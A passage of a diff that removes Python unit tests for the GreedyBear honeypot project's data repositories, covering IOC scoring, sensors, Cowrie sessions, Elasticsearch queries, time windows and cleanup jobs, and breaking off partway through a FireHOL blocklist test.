-        self.assertEqual(test_ioc.name, "1.2.3.4")
-
-    def test_get_scanners_by_pks_returns_correct_iocs(self):
-        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip")
-        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip")
-        IOC.objects.create(name="9.10.11.12", type="ip")  # Should not be returned
-
-        result = list(self.repo.get_scanners_by_pks({ioc1.pk, ioc2.pk}))
-
-        self.assertEqual(len(result), 2)
-        values = [r["value"] for r in result]
-        self.assertIn("1.2.3.4", values)
-        self.assertIn("5.6.7.8", values)
-        self.assertNotIn("9.10.11.12", values)
-
-    def test_get_scanners_by_pks_includes_honeypot_annotation(self):
-        hp = GeneralHoneypot.objects.create(name="TestPot", active=True)
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        ioc.general_honeypot.add(hp)
-
-        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
-
-        self.assertEqual(len(result), 1)
-        self.assertIn("honeypots", result[0])
-
-    def test_get_recent_scanners_returns_recent_only(self):
-        from datetime import datetime, timedelta
-
-        recent_date = datetime.now() - timedelta(days=5)
-        old_date = datetime.now() - timedelta(days=40)
-
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
-        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
-
-        values = [r["value"] for r in result]
-        self.assertIn("1.2.3.4", values)
-        self.assertNotIn("5.6.7.8", values)
-
-    def test_get_recent_scanners_excludes_non_scanners(self):
-        from datetime import datetime, timedelta
-
-        recent_date = datetime.now() - timedelta(days=5)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        result = list(self.repo.get_recent_scanners(cutoff))
-
-        values = [r["value"] for r in result]
-        self.assertNotIn("1.2.3.4", values)
-
-    def test_bulk_update_scores_updates_multiple_iocs(self):
-        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
-        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
-
-        ioc1.recurrence_probability = 0.75
-        ioc2.recurrence_probability = 0.85
-
-        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"])
-
-        self.assertEqual(result, 2)
-        updated1 = IOC.objects.get(name="1.2.3.4")
-        updated2 = IOC.objects.get(name="5.6.7.8")
-        self.assertEqual(updated1.recurrence_probability, 0.75)
-        self.assertEqual(updated2.recurrence_probability, 0.85)
-
-    def test_bulk_update_scores_returns_zero_for_empty_list(self):
-        result = self.repo.bulk_update_scores([], ["recurrence_probability"])
-        self.assertEqual(result, 0)
-
-    def test_bulk_update_scores_updates_multiple_fields(self):
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0, expected_interactions=0.0)
-
-        ioc.recurrence_probability = 0.75
-        ioc.expected_interactions = 10.5
-
-        result = self.repo.bulk_update_scores([ioc], ["recurrence_probability", "expected_interactions"])
-
-        self.assertEqual(result, 1)
-        updated = IOC.objects.get(name="1.2.3.4")
-        self.assertEqual(updated.recurrence_probability, 0.75)
-        self.assertEqual(updated.expected_interactions, 10.5)
-
-    # Edge case tests
-    def test_get_scanners_for_scoring_returns_empty_when_no_scanners(self):
-        # Delete all existing scanners
-        IOC.objects.filter(scanner=True).delete()
-
-        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
-        self.assertEqual(len(result), 0)
-
-    def test_get_scanners_for_scoring_excludes_inactive_honeypots(self):
-        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
-        ioc.general_honeypot.add(hp)
-
-        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
-        names = [ioc.name for ioc in result]
-        self.assertNotIn("1.2.3.4", names)
-
-    def test_get_scanners_for_scoring_with_multiple_honeypots(self):
-        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
-        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
-        ioc.general_honeypot.add(hp1, hp2)
-
-        result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
-
-        names = [ioc.name for ioc in result]
-        # Should appear only once despite multiple honeypots (distinct)
-        self.assertEqual(names.count("1.2.3.4"), 1)
-
-    def test_get_scanners_by_pks_with_empty_set(self):
-        result = list(self.repo.get_scanners_by_pks(set()))
-
-        self.assertEqual(len(result), 0)
-
-    def test_get_scanners_by_pks_with_nonexistent_pks(self):
-        result = list(self.repo.get_scanners_by_pks({99999, 99998}))
-
-        self.assertEqual(len(result), 0)
-
-    def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-
-        result = list(self.repo.get_scanners_by_pks({ioc.pk}))
-
-        self.assertEqual(len(result), 1)
-        self.assertIn("honeypots", result[0])
-
-    def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
-        from datetime import datetime, timedelta
-
-        old_date = datetime.now() - timedelta(days=40)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        result = list(self.repo.get_recent_scanners(cutoff))
-
-        values = [r["value"] for r in result]
-        self.assertNotIn("1.2.3.4", values)
-
-    def test_get_recent_scanners_with_inactive_honeypot(self):
-        from datetime import datetime, timedelta
-
-        hp = GeneralHoneypot.objects.create(name="InactivePot", active=False)
-        recent_date = datetime.now() - timedelta(days=5)
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
-        ioc.general_honeypot.add(hp)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        result = list(self.repo.get_recent_scanners(cutoff))
-
-        values = [r["value"] for r in result]
-        self.assertNotIn("1.2.3.4", values)
-
-    def test_bulk_update_scores_with_custom_batch_size(self):
-        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", recurrence_probability=0.0)
-        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", recurrence_probability=0.0)
-
-        ioc1.recurrence_probability = 0.75
-        ioc2.recurrence_probability = 0.85
-
-        result = self.repo.bulk_update_scores([ioc1, ioc2], ["recurrence_probability"], batch_size=1)
-
-        self.assertEqual(result, 2)
-        updated1 = IOC.objects.get(name="1.2.3.4")
-        updated2 = IOC.objects.get(name="5.6.7.8")
-        self.assertEqual(updated1.recurrence_probability, 0.75)
-        self.assertEqual(updated2.recurrence_probability, 0.85)
-
-
-class TestScoringIntegration(CustomTestCase):
-    """Integration tests for scoring jobs using IocRepository."""
-
-    def setUp(self):
-        from greedybear.cronjobs.repositories import IocRepository
-
-        self.repo = IocRepository()
-
-    def test_update_scores_with_repository(self):
-        """Test UpdateScores class works with injected repository."""
-        import pandas as pd
-
-        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
-        # Create test data
-        IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
-        IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
-
-        # Create score dataframe
-        df = pd.DataFrame(
-            {
-                "value": ["10.1.2.3", "10.5.6.7"],
-                "recurrence_probability": [0.75, 0.85],
-                "expected_interactions": [10.0, 15.0],
-            }
-        )
-
-        # Inject repository and run update
-        job = UpdateScores(ioc_repo=self.repo)
-        result = job.update_db(df)
-
-        # Verify our IOCs were updated (may be more due to test fixtures)
-        self.assertGreaterEqual(result, 2)
-        updated1 = IOC.objects.get(name="10.1.2.3")
-        updated2 = IOC.objects.get(name="10.5.6.7")
-        self.assertEqual(updated1.recurrence_probability, 0.75)
-        self.assertEqual(updated2.recurrence_probability, 0.85)
-
-    def test_update_scores_resets_missing_iocs(self):
-        """Test UpdateScores resets scores for IOCs not in the dataframe."""
-        import pandas as pd
-
-        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
-        # Create test data - one IOC will be missing from df
-        IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
-        IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
-
-        # DataFrame only has one IOC
-        df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
-
-        job = UpdateScores(ioc_repo=self.repo)
-        job.update_db(df)
-
-        # First should be updated, second should be reset to 0
-        updated1 = IOC.objects.get(name="10.2.3.4")
-        updated2 = IOC.objects.get(name="10.6.7.8")
-        self.assertEqual(updated1.recurrence_probability, 0.75)
-        self.assertEqual(updated2.recurrence_probability, 0.0)  # Reset
-
-    def test_get_current_data_with_repository(self):
-        """Test get_current_data utility function works with repository."""
-        from datetime import datetime, timedelta
-
-        from greedybear.cronjobs.scoring.utils import get_current_data
-
-        recent_date = datetime.now() - timedelta(days=5)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
-
-        result = get_current_data(days_lookback=30, ioc_repo=self.repo)
-
-        self.assertIsInstance(result, list)
-        self.assertGreater(len(result), 0)
-        values = [r["value"] for r in result]
-        self.assertIn("1.2.3.4", values)
-
-    def test_get_data_by_pks_with_repository(self):
-        """Test get_data_by_pks utility function works with repository."""
-        from greedybear.cronjobs.scoring.utils import get_data_by_pks
-
-        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-
-        result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
-
-        self.assertIsInstance(result, list)
-        self.assertEqual(len(result), 1)
-        self.assertEqual(result[0]["value"], "1.2.3.4")
-
-    def test_update_scores_with_mock_repository(self):
-        """Test UpdateScores can be fully mocked for unit testing."""
-        from unittest.mock import Mock
-
-        import pandas as pd
-
-        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-
-        # Create mock repository
-        mock_repo = Mock()
-        mock_ioc = Mock()
-        mock_ioc.name = "1.2.3.4"
-        mock_ioc.recurrence_probability = 0.0
-        mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
-        mock_repo.bulk_update_scores.return_value = 1
-
-        # Create score dataframe
-        df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
-
-        # Inject mock and verify it's used
-        job = UpdateScores(ioc_repo=mock_repo)
-        result = job.update_db(df)
-
-        # Verify repository methods were called
-        mock_repo.get_scanners_for_scoring.assert_called_once()
-        mock_repo.bulk_update_scores.assert_called_once()
-        self.assertEqual(result, 1)
-
-
-class TestSensorRepository(CustomTestCase):
-    def setUp(self):
-        self.repo = SensorRepository()
-
-    def test_sensors_property_returns_cached_sensors(self):
-        self.repo.add_sensor("192.168.1.1")
-        self.repo.add_sensor("192.168.1.2")
-        result = self.repo.sensors
-        self.assertEqual(len(result), 2)
-        self.assertIn("192.168.1.1", result)
-        self.assertIn("192.168.1.2", result)
-
-    def test_add_sensor_creates_new_sensor(self):
-        result = self.repo.add_sensor("192.168.1.3")
-        self.assertTrue(result)
-        self.assertTrue(Sensor.objects.filter(address="192.168.1.3").exists())
-        self.assertIn("192.168.1.3", self.repo.cache)
-
-    def test_add_sensor_returns_false_for_existing_sensor(self):
-        self.repo.add_sensor("192.168.1.1")
-        result = self.repo.add_sensor("192.168.1.1")
-        self.assertFalse(result)
-        self.assertEqual(Sensor.objects.filter(address="192.168.1.1").count(), 1)
-
-    def test_add_sensor_rejects_non_ip(self):
-        result = self.repo.add_sensor("not-an-ip")
-        self.assertFalse(result)
-        self.assertFalse(Sensor.objects.filter(address="not-an-ip").exists())
-
-    def test_add_sensor_rejects_domain(self):
-        result = self.repo.add_sensor("example.com")
-        self.assertFalse(result)
-        self.assertFalse(Sensor.objects.filter(address="example.com").exists())
-
-    def test_cache_populated_on_init(self):
-        Sensor.objects.create(address="192.168.1.1")
-        Sensor.objects.create(address="192.168.1.2")
-        repo = SensorRepository()
-        self.assertEqual(len(repo.cache), 2)
-        self.assertIn("192.168.1.1", repo.cache)
-        self.assertIn("192.168.1.2", repo.cache)
-
-    def test_add_sensor_updates_cache(self):
-        initial_cache_size = len(self.repo.cache)
-        self.repo.add_sensor("192.168.1.1")
-        self.assertEqual(len(self.repo.cache), initial_cache_size + 1)
-
-    def test_add_sensor_accepts_valid_ipv4(self):
-        test_ips = ["1.2.3.4", "192.168.1.1", "10.0.0.1", "8.8.8.8"]
-        for ip in test_ips:
-            result = self.repo.add_sensor(ip)
-            self.assertTrue(result)
-
-
-class TestCowrieSessionRepository(CustomTestCase):
-    def setUp(self):
-        self.repo = CowrieSessionRepository()
-
-    def test_get_or_create_session_creates_new(self):
-        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        result = self.repo.get_or_create_session(session_id="123456", source=source_ioc)
-        self.assertIsNotNone(result)
-        self.assertEqual(result.session_id, int("123456", 16))
-        self.assertEqual(result.source, source_ioc)
-
-    def test_get_or_create_session_returns_existing(self):
-        existing_session_id = "ffffffffffff"
-        source = self.cowrie_session.source
-        result = self.repo.get_or_create_session(existing_session_id, source=source)
-        self.assertEqual(result.pk, int(existing_session_id, 16))
-        self.assertTrue(result.login_attempt)
-
-    def test_get_or_create_raises_on_invalid_session_id(self):
-        session_id = "gggggggggggg"
-        source = IOC.objects.create(name="1.2.3.4", type="ip")
-        with self.assertRaises(ValueError):
-            self.repo.get_or_create_session(session_id, source=source)
-
-    def test_save_session_persists_to_database(self):
-        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        session = CowrieSession(session_id=12345, source=source_ioc)
-        result = self.repo.save_session(session)
-        self.assertIsNotNone(result.pk)
-        self.assertTrue(CowrieSession.objects.filter(session_id=12345).exists())
-
-    def test_save_session_updates_existing(self):
-        existing_session_id = "ffffffffffff"
-        source = self.cowrie_session.source
-        session = self.repo.get_or_create_session(existing_session_id, source=source)
-
-        original_interaction_count = session.interaction_count
-        session.interaction_count = 10
-        result = self.repo.save_session(session)
-        self.assertEqual(result.interaction_count, 10)
-        self.assertEqual(
-            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
-            10,
-        )
-
-        session.interaction_count = original_interaction_count
-        result = self.repo.save_session(session)
-        self.assertEqual(result.interaction_count, original_interaction_count)
-        self.assertEqual(
-            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
-            original_interaction_count,
-        )
-
-    def test_get_command_sequence_by_hash_returns_existing(self):
-        existing = self.command_sequence
-        result = self.repo.get_command_sequence_by_hash(existing.commands_hash)
-        self.assertIsNotNone(result)
-        self.assertEqual(result.pk, existing.pk)
-        self.assertEqual(result.commands_hash, existing.commands_hash)
-
-    def test_get_command_sequence_by_hash_returns_none_for_missing(self):
-        result = self.repo.get_command_sequence_by_hash("nonexistent")
-        self.assertIsNone(result)
-
-    def test_save_command_sequence_persists_to_database(self):
-        cmd_seq = CommandSequence(
-            commands=["ls", "pwd", "whoami"],
-            commands_hash="def456",
-        )
-        result = self.repo.save_command_sequence(cmd_seq)
-        self.assertIsNotNone(result.pk)
-        self.assertTrue(CommandSequence.objects.filter(commands_hash="def456").exists())
-
-    def test_save_command_sequence_updates_existing(self):
-        existing = self.command_sequence
-        existing.last_seen = datetime(2025, 1, 2)
-        self.repo.save_command_sequence(existing)
-        updated = CommandSequence.objects.get(commands_hash=existing.commands_hash)
-        self.assertEqual(updated.last_seen.date(), datetime(2025, 1, 2).date())
-
-    def test_get_or_create_session_with_hex_session_id(self):
-        session_id = "abc123"
-        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
-        result = self.repo.get_or_create_session(session_id=session_id, source=source_ioc)
-        self.assertEqual(result.session_id, int(session_id, 16))
-
-    def test_command_sequence_unique_hash_constraint(self):
-        existing = self.command_sequence
-        with self.assertRaises(IntegrityError):
-            CommandSequence.objects.create(
-                commands=["different", "commands"],
-                commands_hash=existing.commands_hash,
-            )
-
-
-class TestElasticRepository(CustomTestCase):
-    def setUp(self):
-        self.mock_client = Mock()
-        self.mock_client.ping.return_value = True
-
-        patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
-        self.mock_settings = patcher.start()
-        self.mock_settings.ELASTIC_CLIENT = self.mock_client
-        self.addCleanup(patcher.stop)
-
-        self.repo = ElasticRepository()
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_q = Mock()
-        with patch.object(self.repo, "_standard_query", return_value=mock_q):
-            mock_search.query.return_value = mock_search
-            mock_search.filter.return_value = mock_search
-            mock_search.count.return_value = 1
-
-            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
-            self.assertTrue(result)
-            mock_search.query.assert_called_once_with(mock_q)
-            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
-            mock_search.count.assert_called_once()
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_q = Mock()
-        with patch.object(self.repo, "_standard_query", return_value=mock_q):
-            mock_search.query.return_value = mock_search
-            mock_search.filter.return_value = mock_search
-            mock_search.count.return_value = 0
-
-            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
-
-            self.assertFalse(result)
-            mock_search.query.assert_called_once_with(mock_q)
-            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
-            mock_search.count.assert_called_once()
-
-    def test_healthcheck_passes_when_ping_succeeds(self):
-        self.mock_client.ping.return_value = True
-        self.repo._healthcheck()
-        self.mock_client.ping.assert_called_once()
-
-    def test_healthcheck_raises_when_ping_fails(self):
-        self.mock_client.ping.return_value = False
-        with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
-            self.repo._healthcheck()
-        self.assertIn("not reachable", str(ctx.exception))
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
-    def test_search_returns_cached_list_not_generator(self, mock_search_class):
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_search.query.return_value = mock_search
-        mock_search.source.return_value = mock_search
-
-        mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
-        mock_search.scan.return_value = iter(mock_hits)
-
-        first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
-        second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
-        self.assertEqual(len(first_iteration), 20_000)
-        self.assertEqual(len(second_iteration), 20_000)
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
-    def test_search_returns_ordered_list(self, mock_search_class):
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_search.query.return_value = mock_search
-        mock_search.source.return_value = mock_search
-
-        mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
-        mock_search.scan.return_value = iter(mock_hits)
-
-        result = list(self.repo.search(minutes_back_to_lookup=10))
-        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
-        self.assertTrue(is_ordered)
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
-    def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
-        """Test legacy extraction uses relative time queries"""
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_search.query.return_value = mock_search
-        mock_search.source.return_value = mock_search
-        mock_search.scan.return_value = iter([])
-
-        # Verify query was called (legacy mode uses different query structure)
-        self.repo.search(minutes_back_to_lookup=11)
-        mock_search.query.assert_called_once()
-
-    @patch("greedybear.cronjobs.repositories.elastic.Search")
-    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
-    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
-    def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
-        """Test non-legacy extraction uses get_time_window"""
-        mock_search = Mock()
-        mock_search_class.return_value = mock_search
-        mock_search.query.return_value = mock_search
-        mock_search.source.return_value = mock_search
-        mock_search.scan.return_value = iter([])
-
-        window_start = datetime(2025, 1, 1, 12, 0, 0)
-        window_end = datetime(2025, 1, 1, 12, 10, 0)
-        mock_get_time_window.return_value = (window_start, window_end)
-
-        self.repo.search(minutes_back_to_lookup=10)
-
-        mock_get_time_window.assert_called_once()
-
-    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
-    @patch("greedybear.cronjobs.repositories.elastic.datetime")
-    def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
-        now = datetime(2023, 1, 1, 0, 0, 0)
-        mock_datetime.now.return_value = now
-        window_start = "2022-12-31T23:50:00"
-        window_end = "2023-01-01T00:00:00"
-        mock_get_time_window.return_value = (window_start, window_end)
-
-        q = self.repo._standard_query(minutes_back_to_lookup=10)
-
-        expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
-        self.assertEqual(q.to_dict(), expected_dict)
-        mock_get_time_window.assert_called_once_with(now, 10)
-
-
-class TestTimeWindowCalculation(CustomTestCase):
-    def test_basic_10min_window(self):
-        """Test a basic window without custom lookback"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_with_custom_lookback(self):
-        """Test window with custom lookback time"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=10)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 5)  # 14:05
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_with_custom_extraction_interval(self):
-        """Test window with custom extraction interval time"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=15)
-
-        expected_end = datetime(2024, 1, 10, 14, 15)  # 14:15
-        expected_start = datetime(2024, 1, 10, 14, 00)  # 14:00
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_exact_boundary(self):
-        """Test behavior when reference time is exactly on a window boundary"""
-        reference = datetime(2024, 1, 10, 14, 20)  # 14:20 exactly
-        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_invalid_lookback(self):
-        """Test that function raises ValueError for invalid lookback"""
-        reference = datetime(2024, 1, 10, 14, 23)
-
-        with self.assertRaises(ValueError):
-            get_time_window(reference, lookback_minutes=5, extraction_interval=10)
-
-    def test_invalid_extraction_interval(self):
-        """Test that function raises ValueError for invalid extraction interval"""
-        reference = datetime(2024, 1, 10, 14, 23)
-
-        with self.assertRaises(ValueError):
-            get_time_window(reference, lookback_minutes=10, extraction_interval=9)
-
-    def test_day_boundary_crossing(self):
-        """Test behavior when window crosses a day boundary"""
-        reference = datetime(2024, 1, 11, 0, 5)  # 00:00
-        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
-
-        expected_end = datetime(2024, 1, 11, 0, 0)  # 00:00
-        expected_start = datetime(2024, 1, 10, 23, 50)  # 23:50 on previous day
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_large_lookback(self):
-        """Test with a large lookback that crosses multiple days"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3, extraction_interval=10)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 7, 14, 20)  # 14:20, 3 days earlier
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-
-# Phase 2: New repository tests for cleanup, firehol, and mass scanners
-
-
-class TestIocRepositoryCleanup(CustomTestCase):
-    """Tests for cleanup-related methods in IocRepository."""
-
-    def setUp(self):
-        self.repo = IocRepository()
-
-    def test_delete_old_iocs_deletes_old_records(self):
-        from datetime import datetime, timedelta
-
-        old_date = datetime.now() - timedelta(days=40)
-        recent_date = datetime.now() - timedelta(days=5)
-
-        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
-        IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        deleted_count = self.repo.delete_old_iocs(cutoff)
-
-        self.assertEqual(deleted_count, 1)
-        self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
-        self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
-
-    def test_delete_old_iocs_returns_zero_when_none_old(self):
-        from datetime import datetime, timedelta
-
-        recent_date = datetime.now() - timedelta(days=5)
-        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        deleted_count = self.repo.delete_old_iocs(cutoff)
-
-        self.assertEqual(deleted_count, 0)
-
-    def test_update_ioc_reputation_updates_existing(self):
-        IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
-
-        result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
-
-        self.assertTrue(result)
-        updated = IOC.objects.get(name="1.2.3.4")
-        self.assertEqual(updated.ip_reputation, "mass scanner")
-
-    def test_update_ioc_reputation_returns_false_for_missing(self):
-        result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
-        self.assertFalse(result)
-
-
-class TestCowrieSessionRepositoryCleanup(CustomTestCase):
-    """Tests for cleanup-related methods in CowrieSessionRepository."""
-
-    def setUp(self):
-        self.repo = CowrieSessionRepository()
-
-    def test_delete_old_command_sequences(self):
-        from datetime import datetime, timedelta
-
-        old_date = datetime.now() - timedelta(days=40)
-        recent_date = datetime.now() - timedelta(days=5)
-
-        CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
-        CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        deleted_count = self.repo.delete_old_command_sequences(cutoff)
-
-        self.assertEqual(deleted_count, 1)
-        self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
-        self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
-
-    def test_delete_incomplete_sessions(self):
-        source = IOC.objects.create(name="1.2.3.4", type="ip")
-
-        CowrieSession.objects.create(session_id=123, source=source, start_time=None)
-        CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
-
-        deleted_count = self.repo.delete_incomplete_sessions()
-
-        self.assertEqual(deleted_count, 1)
-        self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
-        self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
-
-    def test_delete_sessions_without_login(self):
-        from datetime import datetime, timedelta
-
-        source = IOC.objects.create(name="1.2.3.4", type="ip")
-        old_date = datetime.now() - timedelta(days=40)
-        recent_date = datetime.now() - timedelta(days=5)
-
-        # Old session without login
-        CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
-        # Recent session without login
-        CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
-        # Old session with login
-        CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
-
-        cutoff = datetime.now() - timedelta(days=30)
-        deleted_count = self.repo.delete_sessions_without_login(cutoff)
-
-        self.assertEqual(deleted_count, 1)
-        self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
-        self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
-        self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
-
-    def test_delete_sessions_without_commands(self):
-        from datetime import datetime, timedelta
-
-        source = IOC.objects.create(name="1.2.3.4", type="ip")
-        old_date = datetime.now() - timedelta(days=40)
-
-        # Session without commands
-        CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
-        # Session with commands
-        session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
-        cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
-        session_with_cmd.commands = cmd_seq
-        session_with_cmd.save()
-
-        cutoff = datetime.now() - timedelta(days=30)
-        deleted_count = self.repo.delete_sessions_without_commands(cutoff)
-
-        self.assertEqual(deleted_count, 1)
-        self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
-        self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
-
-
-class TestFireHolRepository(CustomTestCase):
-    """Tests for FireHolRepository."""
-
-    def setUp(self):
-        self.repo = FireHolRepository()
-
-    def test_get_or_create_creates_new_entry(self):
-        entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
-
-        self.assertTrue(created)
-        self.assertEqual(entry.ip_address, "1.2.3.4")
-        self.assertEqual(entry.source, "blocklist_de")
